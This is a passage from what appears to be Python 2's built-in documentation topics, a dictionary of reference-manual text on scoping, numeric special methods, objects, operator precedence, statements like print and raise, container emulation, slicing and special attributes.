Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n=================================\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'numbers': u'\nNumeric literals\n****************\n\nThere are four types of numeric literals: plain integers, long\nintegers, floating point numbers, and imaginary numbers. There are no\ncomplex literals (complex numbers can be formed by adding a real\nnumber and an imaginary number).\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator \'"-"\' and the\nliteral "1".\n', 'numeric-types': u'\nEmulating numeric types\n***********************\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). 
For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. 
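A minimal sketch (the class name is\n   invented for the example):\n\n      class Gauge(object):\n          def __init__(self, value):\n              self.value = value\n          def __iadd__(self, other):\n              self.value += other\n              return self    # the result is rebound to "x"\n\n   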
If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n', 'objects': u'\nObjects, values and types\n*************************\n\n*Objects* are Python\'s abstraction for data. All data in a Python\nprogram is represented by objects or by relations between objects. (In\na sense, and in conformance to Von Neumann\'s model of a "stored\nprogram computer," code is also represented by objects.)\n\nEvery object has an identity, a type and a value. An object\'s\n*identity* never changes once it has been created; you may think of it\nas the object\'s address in memory. The \'"is"\' operator compares the\nidentity of two objects; the "id()" function returns an integer\nrepresenting its identity (currently implemented as its address). An\nobject\'s *type* is also unchangeable. [1] An object\'s type determines\nthe operations that the object supports (e.g., "does it have a\nlength?") and also defines the possible values for objects of that\ntype. The "type()" function returns an object\'s type (which is an\nobject itself). The *value* of some objects can change. Objects\nwhose value can change are said to be *mutable*; objects whose value\nis unchangeable once they are created are called *immutable*. (The\nvalue of an immutable container object that contains a reference to a\nmutable object can change when the latter\'s value is changed; however\nthe container is still considered immutable, because the collection of\nobjects it contains cannot be changed. So, immutability is not\nstrictly the same as having an unchangeable value, it is more subtle.)\nAn object\'s mutability is determined by its type; for instance,\nnumbers, strings and tuples are immutable, while dictionaries and\nlists are mutable.\n\nObjects are never explicitly destroyed; however, when they become\nunreachable they may be garbage-collected. 
An implementation is\nallowed to postpone garbage collection or omit it altogether --- it is\na matter of implementation quality how garbage collection is\nimplemented, as long as no objects are collected that are still\nreachable.\n\n**CPython implementation detail:** CPython currently uses a reference-\ncounting scheme with (optional) delayed detection of cyclically linked\ngarbage, which collects most objects as soon as they become\nunreachable, but is not guaranteed to collect garbage containing\ncircular references. See the documentation of the "gc" module for\ninformation on controlling the collection of cyclic garbage. Other\nimplementations act differently and CPython may change. Do not depend\non immediate finalization of objects when they become unreachable (ex:\nalways close files).\n\nNote that the use of the implementation\'s tracing or debugging\nfacilities may keep objects alive that would normally be collectable.\nAlso note that catching an exception with a \'"try"..."except"\'\nstatement may keep objects alive.\n\nSome objects contain references to "external" resources such as open\nfiles or windows. It is understood that these resources are freed\nwhen the object is garbage-collected, but since garbage collection is\nnot guaranteed to happen, such objects also provide an explicit way to\nrelease the external resource, usually a "close()" method. Programs\nare strongly recommended to explicitly close such objects. The\n\'"try"..."finally"\' statement provides a convenient way to do this.\n\nSome objects contain references to other objects; these are called\n*containers*. Examples of containers are tuples, lists and\ndictionaries. The references are part of a container\'s value. In\nmost cases, when we talk about the value of a container, we imply the\nvalues, not the identities of the contained objects; however, when we\ntalk about the mutability of a container, only the identities of the\nimmediately contained objects are implied. So, if an immutable\ncontainer (like a tuple) contains a reference to a mutable object, its\nvalue changes if that mutable object is changed.\n\nTypes affect almost all aspects of object behavior. Even the\nimportance of object identity is affected in some sense: for immutable\ntypes, operations that compute new values may actually return a\nreference to any existing object with the same type and value, while\nfor mutable objects this is not allowed. E.g., after "a = 1; b = 1",\n"a" and "b" may or may not refer to the same object with the value\none, depending on the implementation, but after "c = []; d = []", "c"\nand "d" are guaranteed to refer to two different, unique, newly\ncreated empty lists. (Note that "c = d = []" assigns the same object\nto both "c" and "d".)\n', 'operator-summary': u'\nOperator precedence\n*******************\n\nThe following table summarizes the operator precedences in Python,\nfrom lowest precedence (least binding) to highest precedence (most\nbinding). Operators in the same box have the same precedence. Unless\nthe syntax is explicitly given, operators are binary. 
Operators in\nthe same box group left to right (except for comparisons, including\ntests, which all have the same precedence and chain from left to right\n--- see section Comparisons --- and exponentiation, which groups from\nright to left).\n\n+-------------------------------------------------+---------------------------------------+\n| Operator | Description |\n+=================================================+=======================================+\n| "lambda" | Lambda expression |\n+-------------------------------------------------+---------------------------------------+\n| "if" -- "else" | Conditional expression |\n+-------------------------------------------------+---------------------------------------+\n| "or" | Boolean OR |\n+-------------------------------------------------+---------------------------------------+\n| "and" | Boolean AND |\n+-------------------------------------------------+---------------------------------------+\n| "not" "x" | Boolean NOT |\n+-------------------------------------------------+---------------------------------------+\n| "in", "not in", "is", "is not", "<", "<=", ">", | Comparisons, including membership |\n| ">=", "<>", "!=", "==" | tests and identity tests |\n+-------------------------------------------------+---------------------------------------+\n| "|" | Bitwise OR |\n+-------------------------------------------------+---------------------------------------+\n| "^" | Bitwise XOR |\n+-------------------------------------------------+---------------------------------------+\n| "&" | Bitwise AND |\n+-------------------------------------------------+---------------------------------------+\n| "<<", ">>" | Shifts |\n+-------------------------------------------------+---------------------------------------+\n| "+", "-" | Addition and subtraction |\n+-------------------------------------------------+---------------------------------------+\n| "*", "/", "//", "%" | Multiplication, division, remainder |\n| | [8] |\n+-------------------------------------------------+---------------------------------------+\n| "+x", "-x", "~x" | Positive, negative, bitwise NOT |\n+-------------------------------------------------+---------------------------------------+\n| "**" | Exponentiation [9] |\n+-------------------------------------------------+---------------------------------------+\n| "x[index]", "x[index:index]", | Subscription, slicing, call, |\n| "x(arguments...)", "x.attribute" | attribute reference |\n+-------------------------------------------------+---------------------------------------+\n| "(expressions...)", "[expressions...]", "{key: | Binding or tuple display, list |\n| value...}", "`expressions...`" | display, dictionary display, string |\n| | conversion |\n+-------------------------------------------------+---------------------------------------+\n\n-[ Footnotes ]-\n\n[1] In Python 2.3 and later releases, a list comprehension "leaks"\n the control variables of each "for" it contains into the\n containing scope. However, this behavior is deprecated, and\n relying on it will not work in Python 3.\n\n[2] While "abs(x%y) < abs(y)" is true mathematically, for floats\n it may not be true numerically due to roundoff. For example, and\n assuming a platform on which a Python float is an IEEE 754 double-\n precision number, in order that "-1e-100 % 1e100" have the same\n sign as "1e100", the computed result is "-1e-100 + 1e100", which\n is numerically exactly equal to "1e100". 
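To see this in an\n    interactive session:\n\n       >>> -1e-100 % 1e100\n       1e+100\n\n    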
The function\n "math.fmod()" returns a result whose sign matches the sign of the\n first argument instead, and so returns "-1e-100" in this case.\n Which approach is more appropriate depends on the application.\n\n[3] If x is very close to an exact integer multiple of y, it\'s\n possible for "floor(x/y)" to be one larger than "(x-x%y)/y" due to\n rounding. In such cases, Python returns the latter result, in\n order to preserve that "divmod(x,y)[0] * y + x % y" be very close\n to "x".\n\n[4] While comparisons between unicode strings make sense at the\n byte level, they may be counter-intuitive to users. For example,\n the strings "u"\\u00C7"" and "u"\\u0043\\u0327"" compare differently,\n even though they both represent the same unicode character (LATIN\n CAPITAL LETTER C WITH CEDILLA). To compare strings in a human\n recognizable way, compare using "unicodedata.normalize()".\n\n[5] The implementation computes this efficiently, without\n constructing lists or sorting.\n\n[6] Earlier versions of Python used lexicographic comparison of\n the sorted (key, value) lists, but this was very expensive for the\n common case of comparing for equality. An even earlier version of\n Python compared dictionaries by identity only, but this caused\n surprises because people expected to be able to test a dictionary\n for emptiness by comparing it to "{}".\n\n[7] Due to automatic garbage-collection, free lists, and the\n dynamic nature of descriptors, you may notice seemingly unusual\n behaviour in certain uses of the "is" operator, like those\n involving comparisons between instance methods, or constants.\n Check their documentation for more info.\n\n[8] The "%" operator is also used for string formatting; the same\n precedence applies.\n\n[9] The power operator "**" binds less tightly than an arithmetic\n or bitwise unary operator on its right, that is, "2**-1" is "0.5".\n', 'pass': u'\nThe "pass" statement\n********************\n\n pass_stmt ::= "pass"\n\n"pass" is a null operation --- when it is executed, nothing happens.\nIt is useful as a placeholder when a statement is required\nsyntactically, but no code needs to be executed, for example:\n\n def f(arg): pass # a function that does nothing (yet)\n\n class C: pass # a class with no methods (yet)\n', 'power': u'\nThe power operator\n******************\n\nThe power operator binds more tightly than unary operators on its\nleft; it binds less tightly than unary operators on its right. The\nsyntax is:\n\n power ::= primary ["**" u_expr]\n\nThus, in an unparenthesized sequence of power and unary operators, the\noperators are evaluated from right to left (this does not constrain\nthe evaluation order for the operands): "-1**2" results in "-1".\n\nThe power operator has the same semantics as the built-in "pow()"\nfunction, when called with two arguments: it yields its left argument\nraised to the power of its right argument. The numeric arguments are\nfirst converted to a common type. The result type is that of the\narguments after coercion.\n\nWith mixed operand types, the coercion rules for binary arithmetic\noperators apply. For int and long int operands, the result has the\nsame type as the operands (after coercion) unless the second argument\nis negative; in that case, all arguments are converted to float and a\nfloat result is delivered. For example, "10**2" returns "100", but\n"10**-2" returns "0.01". 
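For instance, an illustrative session showing both the right-to-left\ngrouping and the float result for a negative exponent:\n\n >>> 2**3**2 # evaluated as 2**(3**2)\n 512\n >>> 10**-2\n 0.01\n\n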
(This last feature was added in Python 2.2.\nIn Python 2.1 and before, if both arguments were of integer types and\nthe second argument was negative, an exception was raised).\n\nRaising "0.0" to a negative power results in a "ZeroDivisionError".\nRaising a negative number to a fractional power results in a\n"ValueError".\n', 'print': u'\nThe "print" statement\n*********************\n\n print_stmt ::= "print" ([expression ("," expression)* [","]]\n | ">>" expression [("," expression)+ [","]])\n\n"print" evaluates each expression in turn and writes the resulting\nobject to standard output (see below). If an object is not a string,\nit is first converted to a string using the rules for string\nconversions. The (resulting or original) string is then written. A\nspace is written before each object is (converted and) written, unless\nthe output system believes it is positioned at the beginning of a\nline. This is the case (1) when no characters have yet been written\nto standard output, (2) when the last character written to standard\noutput is a whitespace character except "\' \'", or (3) when the last\nwrite operation on standard output was not a "print" statement. (In\nsome cases it may be functional to write an empty string to standard\noutput for this reason.)\n\nNote: Objects which act like file objects but which are not the\n built-in file objects often do not properly emulate this aspect of\n the file object\'s behavior, so it is best not to rely on this.\n\nA "\'\\n\'" character is written at the end, unless the "print" statement\nends with a comma. This is the only action if the statement contains\njust the keyword "print".\n\nStandard output is defined as the file object named "stdout" in the\nbuilt-in module "sys". If no such object exists, or if it does not\nhave a "write()" method, a "RuntimeError" exception is raised.\n\n"print" also has an extended form, defined by the second portion of\nthe syntax described above. This form is sometimes referred to as\n""print" chevron." In this form, the first expression after the ">>"\nmust evaluate to a "file-like" object, specifically an object that has\na "write()" method as described above. With this extended form, the\nsubsequent expressions are printed to this file object. If the first\nexpression evaluates to "None", then "sys.stdout" is used as the file\nfor output.\n', 'raise': u'\nThe "raise" statement\n*********************\n\n raise_stmt ::= "raise" [expression ["," expression ["," expression]]]\n\nIf no expressions are present, "raise" re-raises the last exception\nthat was active in the current scope. If no exception is active in\nthe current scope, a "TypeError" exception is raised indicating that\nthis is an error (if running under IDLE, a "Queue.Empty" exception is\nraised instead).\n\nOtherwise, "raise" evaluates the expressions to get three objects,\nusing "None" as the value of omitted expressions. The first two\nobjects are used to determine the *type* and *value* of the exception.\n\nIf the first object is an instance, the type of the exception is the\nclass of the instance, the instance itself is the value, and the\nsecond object must be "None".\n\nIf the first object is a class, it becomes the type of the exception.\nThe second object is used to determine the exception value: If it is\nan instance of the class, the instance becomes the exception value. 
If\nthe second object is a tuple, it is used as the argument list for the\nclass constructor; if it is "None", an empty argument list is used,\nand any other object is treated as a single argument to the\nconstructor. The instance so created by calling the constructor is\nused as the exception value.\n\nIf a third object is present and not "None", it must be a traceback\nobject (see section The standard type hierarchy), and it is\nsubstituted instead of the current location as the place where the\nexception occurred. If the third object is present and not a\ntraceback object or "None", a "TypeError" exception is raised. The\nthree-expression form of "raise" is useful to re-raise an exception\ntransparently in an except clause, but "raise" with no expressions\nshould be preferred if the exception to be re-raised was the most\nrecently active exception in the current scope.\n\nAdditional information on exceptions can be found in section\nExceptions, and information about handling exceptions is in section\nThe try statement.\n', 'return': u'\nThe "return" statement\n**********************\n\n   return_stmt ::= "return" [expression_list]\n\n"return" may only occur syntactically nested in a function definition,\nnot within a nested class definition.\n\nIf an expression list is present, it is evaluated, else "None" is\nsubstituted.\n\n"return" leaves the current function call with the expression list (or\n"None") as return value.\n\nWhen "return" passes control out of a "try" statement with a "finally"\nclause, that "finally" clause is executed before really leaving the\nfunction.\n\nIn a generator function, the "return" statement is not allowed to\ninclude an "expression_list". In that context, a bare "return"\nindicates that the generator is done and will cause "StopIteration" to\nbe raised.\n', 'sequence-types': u'\nEmulating container types\n*************************\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilarly to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. 
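For instance, a\nminimal sketch of a read-only sequence type (the class name and\nbehaviour are illustrative, not part of any standard API):\n\n   class Squares:\n       # Emulates a read-only sequence of squares (illustrative).\n       def __init__(self, n):\n           self.n = n\n       def __len__(self):\n           return self.n\n       def __getitem__(self, index):\n           if index < 0:  # negative indexes are up to us\n               index += self.n\n           if not 0 <= index < self.n:\n               raise IndexError(index)\n           return index * index\n\n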
It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent to "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n   Called to implement the built-in function "len()". Should return\n   the length of the object, an integer ">=" 0. Also, an object that\n   doesn\'t define a "__nonzero__()" method and whose "__len__()"\n   method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n   Called to implement evaluation of "self[key]". For sequence types,\n   the accepted keys should be integers and slice objects. Note that\n   the special interpretation of negative indexes (if the class wishes\n   to emulate a sequence type) is up to the "__getitem__()" method. If\n   *key* is of an inappropriate type, "TypeError" may be raised; if of\n   a value outside the set of indexes for the sequence (after any\n   special interpretation of negative values), "IndexError" should be\n   raised. For mapping types, if *key* is missing (not in the\n   container), "KeyError" should be raised.\n\n   Note: "for" loops expect that an "IndexError" will be raised for\n     illegal indexes to allow proper detection of the end of the\n     sequence.\n\nobject.__missing__(self, key)\n\n   Called by "dict"."__getitem__()" to implement "self[key]" for dict\n   subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n   Called to implement assignment to "self[key]". Same note as for\n   "__getitem__()". This should only be implemented for mappings if\n   the objects support changes to the values for keys, or if new keys\n   can be added, or for sequences if elements can be replaced. The\n   same exceptions should be raised for improper *key* values as for\n   the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n   Called to implement deletion of "self[key]". Same note as for\n   "__getitem__()". This should only be implemented for mappings if\n   the objects support removal of keys, or for sequences if elements\n   can be removed from the sequence. The same exceptions should be\n   raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n   This method is called when an iterator is required for a container.\n   This method should return a new iterator object that can iterate\n   over all the objects in the container. For mappings, it should\n   iterate over the keys of the container, and should also be made\n   available as the method "iterkeys()".\n\n   Iterator objects also need to implement this method; they are\n   required to return themselves. For more information on iterator\n   objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n   Called (if present) by the "reversed()" built-in to implement\n   reverse iteration. It should return a new iterator object that\n   iterates over all the objects in the container in reverse order.\n\n   If the "__reversed__()" method is not provided, the "reversed()"\n   built-in will fall back to using the sequence protocol ("__len__()"\n   and "__getitem__()"). 
Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n', 'shifting': u'\nShifting operations\n*******************\n\nThe shifting operations have lower priority than the arithmetic\noperations:\n\n shift_expr ::= a_expr | shift_expr ( "<<" | ">>" ) a_expr\n\nThese operators accept plain or long integers as arguments. The\narguments are converted to a common type. They shift the first\nargument to the left or right by the number of bits given by the\nsecond argument.\n\nA right shift by *n* bits is defined as division by "pow(2, n)". A\nleft shift by *n* bits is defined as multiplication with "pow(2, n)".\nNegative shift counts raise a "ValueError" exception.\n\nNote: In the current implementation, the right-hand operand is\n required to be at most "sys.maxsize". If the right-hand operand is\n larger than "sys.maxsize" an "OverflowError" exception is raised.\n', 'slicings': u'\nSlicings\n********\n\nA slicing selects a range of items in a sequence object (e.g., a\nstring, tuple or list). Slicings may be used as expressions or as\ntargets in assignment or "del" statements. The syntax for a slicing:\n\n slicing ::= simple_slicing | extended_slicing\n simple_slicing ::= primary "[" short_slice "]"\n extended_slicing ::= primary "[" slice_list "]"\n slice_list ::= slice_item ("," slice_item)* [","]\n slice_item ::= expression | proper_slice | ellipsis\n proper_slice ::= short_slice | long_slice\n short_slice ::= [lower_bound] ":" [upper_bound]\n long_slice ::= short_slice ":" [stride]\n lower_bound ::= expression\n upper_bound ::= expression\n stride ::= expression\n ellipsis ::= "..."\n\nThere is ambiguity in the formal syntax here: anything that looks like\nan expression list also looks like a slice list, so any subscription\ncan be interpreted as a slicing. Rather than further complicating the\nsyntax, this is disambiguated by defining that in this case the\ninterpretation as a subscription takes priority over the\ninterpretation as a slicing (this is the case if the slice list\ncontains no proper slice nor ellipses). Similarly, when the slice\nlist has exactly one short slice and no trailing comma, the\ninterpretation as a simple slicing takes priority over that as an\nextended slicing.\n\nThe semantics for a simple slicing are as follows. The primary must\nevaluate to a sequence object. The lower and upper bound expressions,\nif present, must evaluate to plain integers; defaults are zero and the\n"sys.maxint", respectively. If either bound is negative, the\nsequence\'s length is added to it. 
The slicing now selects all items\nwith index *k* such that "i <= k < j" where *i* and *j* are the\nspecified lower and upper bounds. This may be an empty sequence. It\nis not an error if *i* or *j* lie outside the range of valid indexes\n(such items don\'t exist so they aren\'t selected).\n\nThe semantics for an extended slicing are as follows. The primary\nmust evaluate to a mapping object, and it is indexed with a key that\nis constructed from the slice list, as follows. If the slice list\ncontains at least one comma, the key is a tuple containing the\nconversion of the slice items; otherwise, the conversion of the lone\nslice item is the key. The conversion of a slice item that is an\nexpression is that expression. The conversion of an ellipsis slice\nitem is the built-in "Ellipsis" object. The conversion of a proper\nslice is a slice object (see section The standard type hierarchy)\nwhose "start", "stop" and "step" attributes are the values of the\nexpressions given as lower bound, upper bound and stride,\nrespectively, substituting "None" for missing expressions.\n', 'specialattrs': u'\nSpecial Attributes\n******************\n\nThe implementation adds a few special read-only attributes to several\nobject types, where they are relevant. Some of these are not reported\nby the "dir()" built-in function.\n\nobject.__dict__\n\n A dictionary or other mapping object used to store an object\'s\n (writable) attributes.\n\nobject.__methods__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\nobject.__members__\n\n Deprecated since version 2.2: Use the built-in function "dir()" to\n get a list of an object\'s attributes. This attribute is no longer\n available.\n\ninstance.__class__\n\n The class to which a class instance belongs.\n\nclass.__bases__\n\n The tuple of base classes of a class object.\n\nclass.__name__\n\n The name of the class or type.\n\nThe following attributes are only supported by *new-style class*es.\n\nclass.__mro__\n\n This attribute is a tuple of classes that are considered when\n looking for base classes during method resolution.\n\nclass.mro()\n\n This method can be overridden by a metaclass to customize the\n method resolution order for its instances. It is called at class\n instantiation, and its result is stored in "__mro__".\n\nclass.__subclasses__()\n\n Each new-style class keeps a list of weak references to its\n immediate subclasses. This method returns a list of all those\n references still alive. Example:\n\n >>> int.__subclasses__()\n [<type \'bool\'>]\n\n-[ Footnotes ]-\n\n[1] Additional information on these special methods may be found\n in the Python Reference Manual (Basic customization).\n\n[2] As a consequence, the list "[1, 2]" is considered equal to\n "[1.0, 2.0]", and similarly for tuples.\n\n[3] They must have since the parser can\'t tell the type of the\n operands.\n\n[4] Cased characters are those with general category property\n being one of "Lu" (Letter, uppercase), "Ll" (Letter, lowercase),\n or "Lt" (Letter, titlecase).\n\n[5] To format only a tuple you should therefore provide a\n singleton tuple whose only element is the tuple to be formatted.\n\n[6] The advantage of leaving the newline on is that returning an\n empty string is then an unambiguous EOF indication. 
It is also\n possible (in cases where it might matter, for example, if you want\n to make an exact copy of a file while scanning its lines) to tell\n whether the last line of a file ended in a newline or not (yes\n this happens!).\n', 'specialnames': u'\nSpecial method names\n********************\n\nA class can implement certain operations that are invoked by special\nsyntax (such as arithmetic operations or subscripting and slicing) by\ndefining methods with special names. This is Python\'s approach to\n*operator overloading*, allowing classes to define their own behavior\nwith respect to language operators. For instance, if a class defines\na method named "__getitem__()", and "x" is an instance of this class,\nthen "x[i]" is roughly equivalent to "x.__getitem__(i)" for old-style\nclasses and "type(x).__getitem__(x, i)" for new-style classes. Except\nwhere mentioned, attempts to execute an operation raise an exception\nwhen no appropriate method is defined (typically "AttributeError" or\n"TypeError").\n\nWhen implementing a class that emulates any built-in type, it is\nimportant that the emulation only be implemented to the degree that it\nmakes sense for the object being modelled. For example, some\nsequences may work well with retrieval of individual elements, but\nextracting a slice may not make sense. (One example of this is the\n"NodeList" interface in the W3C\'s Document Object Model.)\n\n\nBasic customization\n===================\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. 
